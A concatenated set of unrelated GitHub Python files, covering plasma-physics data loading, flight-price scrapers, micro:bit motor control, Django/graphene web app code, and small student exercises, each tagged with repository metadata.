\n#replace a GUI call\n#np\ndef main():\n #mdsserver = 'localhost'\n #MDSconn = MDSplus.Connection(mdsserver)\n #MDSconn.openTree('ACTIVESPEC', 141716)\n \n #mdsserver = 'skylark.pppl.gov:8501'\n #import MDSplus\n #try:\n #MDSconn = MDSplus.Connection(mdsserver)\n #except:\n mdsserver = 'localhost'\n MDSconn = MDSplus.Connection(mdsserver)\n TT = time()\n shot = 115559\n #shot = 204179\n shot = 141040\n shot = 141040\n rho_coord = 'rho_tor'\n \n \n \n print(shot)\n print_line( ' * Fetching EFIT01 data ...')\n from map_equ import equ_map\n\n eqm = equ_map(MDSconn)\n eqm.Open(shot, 'EFIT01', exp='NSTXU')\n\n #load EFIT data from MDS+ \n T = time()\n eqm._read_pfm()\n eqm.read_ssq()\n eqm._read_scalars()\n eqm._read_profiles()\n print('\\t done in %.1f'%(time()-T))\n \n\n loader = data_loader(MDSconn, shot, eqm, rho_coord)\n\n import tkinter as tk\n myroot = tk.Tk(className=' Profiles')\n\n I = lambda x: tk.IntVar(value=x)\n S = lambda x: tk.StringVar(value=x)\n D = lambda x: tk.DoubleVar(value=x)\n \n \n ts_revisions = []\n CHERS_revisions = []\n \n default_settings = OrderedDict()\n\n default_settings['Ti']={'systems':{'CER system':([], )},\\\n 'load_options':{'CER system':{'Analysis':(S('CT2'), CHERS_revisions),\n 'Corrections':{'Zeeman Splitting':I(1) }}}}\n\n default_settings['omega']= {'systems':{'CER system':([], )},\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n default_settings['nC6'] = {'systems':{'CER system':([],) },\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n default_settings['Te']= {'systems':{'TS system':(['LFS',I(1)],['HFS',I(1)]) },\n 'load_options':{'TS system':{\"TS revision\":(S('BEST'), ts_revisions)}}}\n\n default_settings['ne']= {'systems':{'TS system':(['LFS',I(1)],['HFS',I(1)])},\n 'load_options':{'TS system':{\"TS revision\":(S('BEST'), ts_revisions)}}}\n \n default_settings['Mach']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n default_settings['Te/Ti']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n #loader.load_splines()\n loader.load_mode_loc()\n \n try:\n data = loader( 'ne', default_settings,tbeg=eqm.t_eq[0], 
tend=eqm.t_eq[-1])\n finally:\n MDSconn.disconnect()\n print('\\t done in %.1f'%(time()-T))\n \n print('\\n\\t\\t\\t Total time %.1fs'%(time()-TT))\n\n \nif __name__ == \"__main__\":\n main()\n \n\n\n\n\n","repo_name":"odstrcilt/quickfit","sub_path":"NSTX/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":42071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"73149476524","text":"import requests\nfrom pprint import pprint\n\n#you'll need to create your own Google Sheet with 2 tabs: one with destinations containing threshold prices and another one with users\nSHEETY_PRICES_ENDPOINT = \"https://api.sheety.co/048eff315fe5903f3238db08d1766717/flightDeals/prices\"\nSHEETY_USERS_ENDPOINT = \"https://api.sheety.co/048eff315fe5903f3238db08d1766717/flightDeals/users\"\n\n\nclass DataManager:\n def __init__(self):\n self.destination_data = {}\n\n def get_destination_data(self):\n response = requests.get(SHEETY_PRICES_ENDPOINT)\n data = response.json()\n self.destination_data = data[\"prices\"]\n return self.destination_data\n\n def update_destination_codes(self):\n for city in self.destination_data:\n new_data = {\n \"price\": {\n \"iataCode\": city[\"iataCode\"],\n }\n }\n response = requests.put(\n url=f\"{SHEETY_PRICES_ENDPOINT}/{city['id']}\",\n json=new_data,\n )\n print(response.text)\n\n def get_user_data(self):\n response = requests.get(SHEETY_USERS_ENDPOINT)\n data = response.json()\n self.user_data = data[\"users\"]\n return self.user_data\n\n# for row in range(len(result[\"prices\"])):\n# print(result[\"prices\"][row][\"city\"])\n\n","repo_name":"ArturMalkov/Flightdeals","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"22473282477","text":"#!/bin/python\n\nimport random\nfrom time import sleep\n\nprob_victim = [1, 1, 2, 2, 3]\nprob_attacker = [3, 1, 2, 3, 1]\nmin_time = 1\nmax_time = 5\n\nDATA = [{\n \"id\": i, \n \"victim\": sum(prob_victim[:i + 1])/sum(prob_victim), \n \"attacker\": sum(prob_attacker[:i + 1])/sum(prob_attacker)}\n for i in range(len(prob_victim))]\n\ndef get_random(key):\n r = random.random()\n for person in DATA:\n if person[key] > r:\n return person[\"id\"]\n\n raise ValueError('Cannot get {} for random number: {}'.format(key, r))\n\ndef get_random_victim():\n return get_random(\"victim\")\n\ndef get_random_attacker():\n return get_random(\"attacker\")\n\nwhile True:\n victim = get_random_victim()\n attacker = get_random_attacker()\n print(\"{} attacking {}\".format(attacker, victim))\n\n to_sleep = random.random() * (max_time - min_time) + min_time\n sleep(to_sleep)\n\n\n","repo_name":"lkrsnik/dragon_hack_2017","sub_path":"scripts/random_attacks.py","file_name":"random_attacks.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"35408018527","text":"from microbit import *\r\nDir = [\r\n 'f',\r\n 'b',\r\n]\r\n\r\n\r\nclass MotorDriver():\r\n def __init__(self):\r\n self.PWMA = pin8\r\n self.AIN1 = pin13\r\n self.AIN2 = pin12\r\n self.PWMB = pin16\r\n self.BIN1 = pin14\r\n self.BIN2 = pin15\r\n self.S0 = pin0\r\n self.S1 = pin1\r\n self.S2 = pin2\r\n self.S0.set_analog_period(20)\r\n self.S1.set_analog_period(20)\r\n self.S2.set_analog_period(20)\r\n\r\n def MotorRun(self, motor, index, speed):\r\n if(speed > 16):\r\n 
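# Descriptive note on the random_attacks record above: DATA holds cumulative
# probabilities, e.g. prob_victim = [1, 1, 2, 2, 3] (sum 9) yields victim
# thresholds [1/9, 2/9, 4/9, 6/9, 1.0], and get_random(key) draws r in [0, 1)
# and returns the first id whose threshold exceeds r - i.e. inverse-CDF
# sampling over the ids.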
return\r\n speed = speed * 64 - 1\r\n\r\n if(motor == 0):\r\n self.PWMA.write_analog(speed)\r\n if(index == Dir[0]):\r\n self.AIN1.write_digital(1)\r\n self.AIN2.write_digital(0)\r\n else:\r\n self.AIN1.write_digital(0)\r\n self.AIN2.write_digital(1)\r\n else:\r\n self.PWMB.write_analog(speed)\r\n if(index == Dir[0]):\r\n self.BIN1.write_digital(1)\r\n self.BIN2.write_digital(0)\r\n else:\r\n self.BIN1.write_digital(0)\r\n self.BIN2.write_digital(1)\r\n\r\n def MotorStop(self, motor):\r\n if (motor == 0):\r\n self.PWMA.write_analog(0)\r\n else:\r\n self.PWMB.write_analog(0)\r\n\r\n def ServosTurnZero(self, servo):\r\n if(servo == 0):\r\n self.S0.write_analog(25)\r\n elif(servo == 1):\r\n self.S1.write_analog(25)\r\n else:\r\n self.S2.write_analog(25)\r\n\r\n def ServosTurnFull(self, servo):\r\n if(servo == 0):\r\n self.S0.write_analog(128)\r\n elif(servo == 1):\r\n self.S1.write_analog(128)\r\n else:\r\n self.S2.write_analog(128)\r\n\r\n def ServosStop(self, servo):\r\n if(servo == 0):\r\n self.S0.write_analog(0)\r\n elif(servo == 1):\r\n self.S1.write_analog(0)\r\n else:\r\n self.S2.write_analog(0)\r\n\r\n def ServoTurn(self, servo, angle):\r\n if(angle > 180):\r\n return\r\n temp = angle / 2 + 25\r\n if(servo == 0):\r\n self.S0.write_analog(temp)\r\n elif(servo == 1):\r\n self.S1.write_analog(temp)\r\n else:\r\n self.S2.write_analog(temp)\r\n\r\n\r\n\r\n","repo_name":"cyryllo/BorsukPY","sub_path":"borsuk.py","file_name":"borsuk.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4233737647","text":"import config\nimport futium\nfrom datetime import date\nfrom datetime import datetime\n\npre_mrkt, post_mrkt, data_date, version = config.pre_mrkt, config.post_mrkt, config.data_date.lower(), config.version\n\n## convert to integer then to string \npre_mrkt, post_mrkt = str(int(config.pre_mrkt == True)), str(int(config.post_mrkt == True))\n\n# get date value\nif data_date != 'today':\n file_date = datetime.strptime(data_date, '%Y-%m-%d').date()\nelse:\n file_date = date.today()\n\n\n# convert them to single char \nfile_dates = [str(file_date.year)[2:], futium.oneChar(file_date.month), futium.oneChar(file_date.day)]\n\ndef filename(ticker, k):\n if k == 'raw':\n filename = \"\".join([ticker, '-', ''.join(file_dates), '.parquet'])\n else: \n # if the ticker is an actual stock\n if ticker != '':\n # [ticker]-[version]-[k][date][preMRKT][postMRKT].csv\n filename = \"\".join([ticker, '-', version, '-', str(k), ''.join(file_dates), pre_mrkt, post_mrkt, '.parquet'])\n else: \n filename = \"\".join([version, '-' + str(k), ''.join(file_dates), pre_mrkt, post_mrkt, '.csv'])\n \n return filename\n","repo_name":"Futium/quantitative-analysis","sub_path":"naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28629963487","text":"class Solution:\n def isValid(self, s: str) -> bool:\n stack = []\n bracket = {'(': ')', '[': ']', '{': '}'}\n for ch in s:\n if ch in bracket:\n stack.append(ch)\n\n else:\n if not stack or bracket[stack.pop()] != ch:\n return False\n\n return len(stack) == 0","repo_name":"pleiadex/coding-test","sub_path":"leetcode/Valid_Parentheses.py","file_name":"Valid_Parentheses.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8511289476","text":"# You are 
close on the last one.\n# You just need to go through your list and see which is the most frequent (count each one).\n# nice work.\n\n'''\nComplete the following 3 searching problems using techniques\nfrom class and from Ch15 of the textbook website\n'''\n\n#1. (7pts) Write code which finds and prints the longest word in the provided dictionary.\n# If there are more than one longest word, print them all.\n# Make a list and add words to them based on length\nprint(\"Problem #1\")\nimport re\ndef split_line(line):\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\n\ndictionary_list = []\nfile = open(\"dictionary.txt\", \"r\")\nfor line in file:\n words = split_line(line)\n for word in words:\n dictionary_list.append(word)\nfile.close()\n\n# find the longest length, then collect every word of that length\nlongest_length = 0\nfor word in dictionary_list:\n if len(word) > longest_length:\n longest_length = len(word)\n\nlongest_words = []\nfor word in dictionary_list:\n if len(word) == longest_length:\n longest_words.append(word)\n\nprint(\"The length of the longest word is\", longest_length, \"letters.\")\nprint(\"The longest word(s):\", \", \".join(longest_words))\n\n#2. (10pts) Write code which finds\n# The total word count AND average word length\n# in \"AliceInWonderLand.txt\"\nprint(\"Problem #2\")\n\nfile = open(\"AliceInWonderland.txt\", \"r\")\nalice = []\nfor line in file:\n words = split_line(line)\n for word in words:\n alice.append(word.lower())\nprint(\"There are\", (len(alice)), \"words in 'Alice In Wonderland'.\")\n\n# make an algorithm to find the average length\ntracking = 0\nfor item in range(len(alice)):\n tracking += len(alice[item])\n\naverage = tracking / len(alice)\naverage = round(average, 2)\nprint(\"The average number of letters in the words in 'Alice In Wonderland' is\", average ,\"letters.\")\nfile.close()\n\n\n##### CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS #####\nprint(\"\\nCHOOSE\")\n#3 (13pts) How many times does \"Cheshire\" occur in\"AliceInWonderLand.txt\"?\n# How many times does \"Cat\" occur?\n# How many times does \"Cheshire\" immediately followed by \"Cat\" occur?\n# use .upper and .lower\n\n'''\nfor items in alice:\n number = 0\n for words in range(len(alice)):\n if alice[words].lower() == str(\"Cheshire\").lower():\n number += 1\nprint(number)\n'''\n\n### OR ###\n\n\n#3 (13pts)Find the most frequently occurring\n# seven letter word in \"AliceInWonderLand.txt\"\nprint(\"\\nProblem #3\")\n\n# count how often each seven-letter word occurs, per the feedback at the top\nseven_letter_counts = {}\nfor word in alice:\n if len(word) == 7:\n if word in seven_letter_counts:\n seven_letter_counts[word] += 1\n else:\n seven_letter_counts[word] = 1\n\nmost_frequent = \"\"\nhighest_count = 0\nfor word in seven_letter_counts:\n if seven_letter_counts[word] > highest_count:\n highest_count = seven_letter_counts[word]\n most_frequent = word\n\nprint(\"The most frequent seven letter word is\", most_frequent, \"- it occurs\", highest_count, \"times.\")\n\n# Challenge problem (for fun). 
What words appear in the text of \"Alice in Wonderland\" that DO NOT occur in \"Alice Through the Looking Glass\".\n# Make a list. You can substitute this for any of the above problems.\n","repo_name":"ParkerCS/ch15-searches-elizafischer","sub_path":"ch15ProblemSet.py","file_name":"ch15ProblemSet.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12641518165","text":"import logging\n\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom channels.layers import get_channel_layer\n\nlogger = logging.getLogger(\"vdx_id.%s\" % __name__)\n\n\n_CHANNEL_LAYER = None\n\n\ndef get_channel():\n global _CHANNEL_LAYER\n if _CHANNEL_LAYER is None:\n _CHANNEL_LAYER = get_channel_layer()\n return _CHANNEL_LAYER\n\n\nclass NotificationConsumer(AsyncJsonWebsocketConsumer):\n channel_layer_name = \"notifications\"\n\n async def connect(self):\n # if self.scope[\"user\"].is_anonymous:\n # self.close()\n # return\n\n await self.channel_layer.group_add(\n self.channel_layer_name, self.channel_name\n )\n await self.accept()\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(\n self.channel_layer_name, self.channel_name\n )\n\n # Must correspond to the 'type' of the channel message\n async def task_update(self, event):\n await self.send_json(event)\n\n async def agent_task_update(self, event):\n await self.send_json(event)\n\n async def notification(self, event):\n await self.send_json(event)\n\n async def map_update(self, event):\n await self.send_json(event)\n","repo_name":"vadix-solutions/portunus-lite","sub_path":"src/web_interface/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"695903357","text":"from prettytable import PrettyTable\nimport requests\nimport json\nfrom addresses import Address\n\n\ndef xie_cheng(dcity, acity, date):\n date = date[0:4] + '-' + date[4:6] + '-' + date[6:8]\n headers = Address.headers\n city = Address.city\n url = 'https://flights.ctrip.com/itinerary/api/12808/products'\n request_payload = {\"flightWay\": \"Oneway\",\n \"army\": \"false\",\n \"classType\": \"ALL\",\n \"hasChild\": 'false',\n \"hasBaby\": 'false',\n \"searchIndex\": 1,\n \"portingToken\": \"3fec6a5a249a44faba1f245e61e2af88\",\n \"airportParams\": [\n {\"dcity\": city.get(dcity), \"acity\": city.get(acity), \"dcityname\": dcity, \"acityname\": acity,\n \"date\": date}]}\n\n # 这里传进去的参数必须为 json\n response = requests.post(url, data=json.dumps(request_payload), headers=headers)\n response = response.text\n routeList = json.loads(response)[\"data\"].get('routeList')\n table = PrettyTable([\"Airline\", \"FlightNumber\", \"DepartureDate\", \"ArrivalDate\", \"PunctualityRate\", \"LowestPrice\"])\n # print(\"123\",routeList)\n for route in routeList:\n if len(route.get('legs')) == 1:\n info = {}\n legs = route.get('legs')[0]\n flight = legs.get('flight')\n info['Airline'] = flight.get('airlineName')\n info['FlightNumber'] = flight.get('flightNumber')\n info['DepartureDate'] = flight.get('departureDate')[-8:-3]\n info['ArrivalDate'] = flight.get('arrivalDate')[-8:-3]\n info['PunctualityRate'] = flight.get('punctualityRate')\n info['LowestPrice'] = legs.get('characteristic').get('lowestPrice')\n\n table.add_row(info.values())\n\n print(dcity, '------->', acity, date)\n print(table)\n\n\nif __name__ == \"__main__\":\n dcity = 
input('请输入起点: ')\n acity = input('请输入终点: ')\n date = input('请输入出行日期: ')\n xie_cheng(dcity, acity, date)\n","repo_name":"Bistard/python-play-ground","sub_path":"PROJ14-Auto_Flight_Ticket_Search/sample/guo_lei_flight_tickets.py","file_name":"guo_lei_flight_tickets.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35408018527","text":"import json\nfrom typing import Optional, List\nfrom src.domain.locator import LocatorStorage, Locator\n\nclass Master(LocatorStorage):\n def __init__(self, locator: Locator):\n super().__init__(locator)\n #self.tg = self.locator.tg()\n self.kp = self.locator.kp()\n\n def findMovies(self, request: str) -> list[str]:\n response = json.loads(self.kp.getMovies(request))['docs']\n films = [x for x in response if request.lower() in x['name'].lower()]\n films.sort(key=lambda x: x['year'])\n return films\n\n#END","repo_name":"KennySuke/Tunnely_bot","sub_path":"src/managers/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16419289697","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 2 18:03:22 2021\r\n\r\n@author: user\r\n\"\"\"\r\nimport json\r\nfrom lxml import html\r\nimport requests\r\nfrom Docker_mySQL_Connector import insert_values,make_connection\r\nfrom datetime import datetime\r\nimport time\r\n\r\n#initialize the files\r\n\r\ndef time_files_initialize(filename):\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n out_file = open(filename, \"r\") \r\n data=json.load(out_file)\r\n return current_time,data,1\r\n#load data from mySQL\r\ndef load_category_contents(mycursor,section,website_name):\r\n sql_select_Query = \"select content,time from web_sections_final where category=%s and wesite_name=%s\"\r\n tuple1 = (section,website_name)\r\n mycursor.execute(sql_select_Query,tuple1)\r\n records=mycursor.fetchall()\r\n contents=[]\r\n if len(records)>1:\r\n for i in records:\r\n contents.append(i[0])\r\n return contents,1\r\n\r\n\r\n\r\ndef get_web_DOM_tree(data,website_name):\r\n web_url=data[website_name]['url']\r\n page = requests.get(data[website_name]['url'])\r\n tree = html.fromstring(page.content)\r\n return tree,web_url,1\r\n\r\n# get the newly updated item by matching to Mysql database\r\ndef get_updated_item(latest,contents,web_url,section,website_name,mycursor):\r\n try:\r\n for item in latest:\r\n flag=0\r\n for value in contents:\r\n if (item==value):\r\n flag=1\r\n if(flag==0):\r\n print(web_url+\": \"+section+\" :Updated :\"+item)\r\n insert_values(mycursor,str(website_name),str(data[website_name]['url']),str(section),str(item),current_time)\r\n mydb.commit()\r\n except:\r\n print('error')\r\n# go to each category of the website\r\ndef section_scanner(data,website_name,contents,section,web_url,tree,mycursor):\r\n try:\r\n latest=tree.xpath(data[website_name][section])\r\n get_updated_item(latest,contents,web_url,section,website_name,mycursor)\r\n except:\r\n print('')\r\n\r\n#scan the websites\r\ndef web_scanner(mycursor,data):\r\n for website_name in data:\r\n tree,web_url,e =get_web_DOM_tree(data,website_name)\r\n for section in data[website_name]:\r\n contents,e=load_category_contents(mycursor,section,website_name)\r\n section_scanner(data,website_name,contents,section,web_url,tree,mycursor)\r\n 
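# NOTE: get_updated_item() already writes each new row via insert_values() and commits, so the call below is redundant and stays commented out: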
#insert_values(mycursor,str(website_name),str(data[website_name]['url']),str(section),str(item),current_time)\r\n \r\n return 1\r\nif __name__ == \"__main__\": \r\n while(True):\r\n print('hello geek!')\r\n time.sleep(300)\r\n current_time,data,e=time_files_initialize(\"my_web_Xpath1.json\") \r\n mydb,mycursor=make_connection() \r\n web_scanner(mycursor,data)\r\n print('hey')\r\n #mydb.close()\r\n mycursor.close()\r\n","repo_name":"Sakib99/Isentia_Task","sub_path":"Final_Script.py","file_name":"Final_Script.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38895996269","text":"import graphene\nfrom home.GraphQL.types.location_type import LocationType\nfrom home.models import Location, Homestead\n\n\nclass UpdateLocationMutation(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n description = graphene.String(required=True)\n primary_location = graphene.Boolean()\n homestead_id = graphene.ID()\n id = graphene.ID()\n\n location = graphene.Field(LocationType)\n\n @classmethod\n def mutate(cls, root, info, name, description, primary_location, homestead_id):\n location = Location.objects.get(pk=id)\n save_location(location, description, name, primary_location, homestead_id)\n\n return UpdateLocationMutation(location=location)\n\n\nclass CreateLocationMutation(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n description = graphene.String(required=True)\n primary_location = graphene.Boolean()\n homestead_id = graphene.ID()\n\n location = graphene.Field(LocationType)\n\n @classmethod\n def mutate(cls, root, info, name, description, primary_location, homestead_id):\n location = Location()\n save_location(location, description, name, primary_location, homestead_id)\n\n return CreateLocationMutation(location=location)\n\n\ndef save_location(location, description, name, primary_location, homestead_id):\n location.name = name\n location.description = description\n location.primary_location = primary_location\n homestead = Homestead.objects.get(pk=homestead_id)\n location.homestead = homestead\n location.save()\n","repo_name":"HomesteadOS/HomesteadOS","sub_path":"home/GraphQL/mutations/location_mutations.py","file_name":"location_mutations.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33880230246","text":"import jsonpickle\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom cartapp.cartmanager import DBCartManger\n\n# Create your views here.\ndef toOrder(request):\n cartitems = request.GET.get('cartitems','')\n # 获取支付总金额\n totalPrice = request.GET.get('totalPrice','')\n\n #判断是否登录\n if not request.session.get('user'):\n print('没有用户')\n # return HttpResponseRedirect(f'/user/login/?reflag=order&cartitems={cartitems}')\n return render(request,'login.html',{'reflag':'order','cartitems':cartitems})\n\n #反序列化cartiItems\n cartitemsList = jsonpickle.loads(cartitems)\n\n #获取默认收货地址\n user = jsonpickle.loads(request.session.get('user',''))\n addrObj = user.address_set.filter(isdefault = True)[0]\n print(addrObj)\n #获取订单内容\n cartItemObjList = [DBCartManger(user).get_cartitems(**(jsonpickle.loads(item))) for item in cartitemsList if item ]\n\n context ={\n 'cartitemsObjList':cartItemObjList,\n 'addrObj':addrObj,\n 'totalPrice':totalPrice,\n\n }\n return 
render(request,'order.html',context)","repo_name":"LiShaoquan2/netshop","sub_path":"orderapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1139333719","text":"import functools\nimport httpx\nfrom discord import Embed, Colour\n\nfrom psychotropic import settings\n\n\nclass DefaultEmbed(Embed):\n def __init__(self, **kwargs):\n super().__init__(\n type = 'rich',\n colour = settings.COLOUR,\n **kwargs\n )\n\n\nclass ErrorEmbed(Embed):\n def __init__(self, msg=None, info=None, **kwargs):\n msg = msg or \"Something went wrong\"\n super().__init__(\n type = 'rich',\n colour = Colour.red(),\n title = f\"Error: {msg} :(\",\n description = info,\n **kwargs\n )\n\n\ndef provider_embed_factory(provider):\n \"\"\"Factory method intended to generate provider embed classes.\"\"\"\n class ProviderEmbed(DefaultEmbed): \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.set_author(**provider)\n \n return ProviderEmbed\n\n\ndef send_embed_on_exception(func):\n \"\"\"Decorator to send an embed if errors occurs during command\n processing. Exceptions are still raised after the embed is sent.\n \"\"\"\n @functools.wraps(func)\n async def inner(self, interaction, *args, **kwargs):\n try:\n return await func(self, interaction, *args, **kwargs)\n except httpx.RequestError:\n await interaction.followup.send(embed=ErrorEmbed(\n \"Can't connect to external server\",\n \"Maybe you should retry later?\")\n )\n raise\n except Exception:\n await interaction.followup.send(embed=ErrorEmbed())\n raise\n return inner\n","repo_name":"x-yzt/psychotropic","sub_path":"psychotropic/embeds.py","file_name":"embeds.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"31972648952","text":"from typing import List, Any\nfrom django.forms import MultiWidget, TextInput, Select, Widget\nfrom core.custom_types import Val\nfrom core.validators import ValValidator\nfrom core.models.core_tables import TypeDef\nimport json\nimport numpy as np\nfrom django.forms import (\n MultiWidget,\n TextInput,\n Select,\n MultiValueField,\n CharField,\n ChoiceField,\n)\nfrom django.utils.safestring import mark_safe\nfrom django.forms import widgets\nfrom django.conf import settings\nfrom django.urls import reverse\n\n\nclass RelatedFieldWidgetCanAdd(widgets.Select):\n def __init__(\n self, related_model, related_url=None, related_instance=None, *args, **kwargs\n ):\n super().__init__(*args, **kwargs)\n if not related_url:\n rel_to = related_model\n info = (rel_to._meta.app_label, rel_to._meta.object_name.lower())\n related_url = \"admin:%s_%s_add\" % info\n\n # Be careful that here \"reverse\" is not allowed\n self.related_base_url = related_url\n self.related_model = related_model\n self.related_instance = related_instance\n\n def render(self, name, value, *args, **kwargs):\n self.related_base_url = reverse(self.related_base_url)\n if self.related_instance is not None:\n # Add a GET parameter so that the correct value is filled\n self.related_url = (\n self.related_base_url + f\"?related_uuid={self.related_instance.uuid}\"\n )\n else:\n self.related_url = self.related_base_url\n\n output: \"List[Any]\" = [super().render(name, value, *args, **kwargs)]\n output.append(f'')\n output.append(\n f' Add another {self.related_model._meta.object_name}'\n )\n if self.choices:\n output.append(\n f\"\"\"
    \n Edit selected {self.related_model._meta.object_name}

    \n Delete selected {self.related_model._meta.object_name}\"\"\"\n )\n output.append(\n f\"\"\"\"\"\"\n )\n return mark_safe(f\"\".join(output))\n\n\nclass ValWidget(MultiWidget):\n def __init__(self, attrs={}):\n # value, unit and type\n data_types = TypeDef.objects.filter(category=\"data\")\n try:\n data_type_choices = [\n (data_type.description, data_type.description)\n for data_type in data_types\n ]\n except Exception as e:\n data_type_choices = [(\"num\", \"num\"), (\"text\", \"text\"), (\"bool\", \"bool\")]\n select_attrs = {\n \"class\": \"selectpicker\",\n \"data-style\": \"btn-primary\",\n \"data-live-search\": \"true\",\n \"placeholder\": \"DataType\",\n }\n if \"disable_select\" in attrs:\n select_attrs[\"disabled\"] = \"disabled\"\n\n widgets = [\n TextInput(attrs={\"placeholder\": \"Value\"}),\n TextInput(attrs={\"placeholder\": \"Unit\"}),\n Select(attrs=select_attrs, choices=data_type_choices),\n ]\n super().__init__(widgets, attrs)\n\n def decompress(self, value):\n if isinstance(value, Val):\n if not value.null:\n return [\n value.value,\n value.unit,\n str(value.val_type.description),\n value.value,\n ]\n\n return [None, None, None, None]\n\n def get_context(self, name, value, attrs):\n context = super().get_context(name, value, attrs)\n # table_subwidget = context[\"widget\"][\"subwidgets\"][3]\n value_text_subwidget = context[\"widget\"][\"subwidgets\"][0]\n select_subwidget = context[\"widget\"][\"subwidgets\"][2]\n\n # Checking if the selected datatype has the term 'array' in it\n if [datatype for datatype in select_subwidget[\"value\"] if \"array\" in datatype]:\n # table_subwidget[\"is_hidden\"] = False\n value_text_subwidget[\"attrs\"][\"hidden\"] = True # Hide text box\n\n list_value = json.loads(value_text_subwidget[\"value\"])\n list_value = np.array(list_value)\n num_rows = int(len(list_value) / 8)\n num_cols = 8\n\n list_value.resize(num_rows * num_cols)\n list_value = np.reshape(list_value, (num_rows, num_cols))\n\n # table_subwidget[\"rows\"] = [i + 1 for i in range(num_rows)]\n # table_subwidget[\"values\"] = list_value\n\n return context\n\n\nclass ValFormField(MultiValueField):\n widget = ValWidget()\n\n def __init__(self, *args, **kwargs):\n errors = self.default_error_messages.copy()\n if \"error_messages\" in kwargs:\n errors.update(kwargs[\"error_messages\"])\n data_types = TypeDef.objects.filter(category=\"data\")\n try:\n data_type_choices = [\n (data_type.description, data_type.description)\n for data_type in data_types\n ]\n except Exception as e:\n data_type_choices = [(\"num\", \"num\"), (\"text\", \"text\"), (\"bool\", \"bool\")]\n fields = (\n CharField(\n error_messages={\n \"incomplete\": \"Must enter a value\",\n }\n ),\n CharField(required=False),\n ChoiceField(choices=data_type_choices, initial=\"num\"),\n )\n if \"max_length\" in kwargs:\n kwargs.pop(\"max_length\")\n\n super().__init__(fields, *args, **kwargs)\n\n def compress(self, data_list):\n if data_list:\n value, unit, val_type_text = data_list\n val_type = TypeDef.objects.get(category=\"data\", description=val_type_text)\n val = Val(val_type, value, unit)\n return val\n return Val(None, None, None, null=True)\n\n def validate(self, value):\n # print(f\"validating {value}\")\n validator = ValValidator()\n validator(value)\n","repo_name":"darkreactions/ESCALATE","sub_path":"escalate/core/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} 
+{"seq_id":"11480855799","text":"from re import X\nimport sqlite3 as sql\nfrom django.shortcuts import render, redirect\nfrom .models import comentario, register_data\nfrom django.http import HttpResponse\n\n\n# Create your views here.\ndef index(request):\n com = comentario.objects.all()\n return render(request, \"index.html\", {\"texto\": com})\n\n\ndef login(request):\n return render(request, \"login.html\")\n\n\ndef crearcuenta(request):\n return render(request, \"register.html\")\n\ndef redireccionarlogin(request):\n nombre = request.POST[\"usuario\"]\n contraseña = request.POST[\"contraseña\"]\n conf_contraseña = request.POST[\"confirmar\"]\n if contraseña == conf_contraseña:\n usuario = register_data(nombre_usuario = nombre, contraseña_usuario = contraseña, verificacion_contraseña = conf_contraseña)\n else:\n return render(request, \"error.html\")\n \n\n d_b = \"registro.db\"\n coneccion = sql.connect(d_b)\n cursor = coneccion.cursor()\n cursor.execute(\"SELECT * FROM sheshagym_register_data\")\n x = cursor.fetchall()\n template = \"\"\"\n
    \n

    Registro ocupado

    \n

    El usuario ya existe en el sistema

    \n

    Vuelva e intente de nuevo

    \n \n
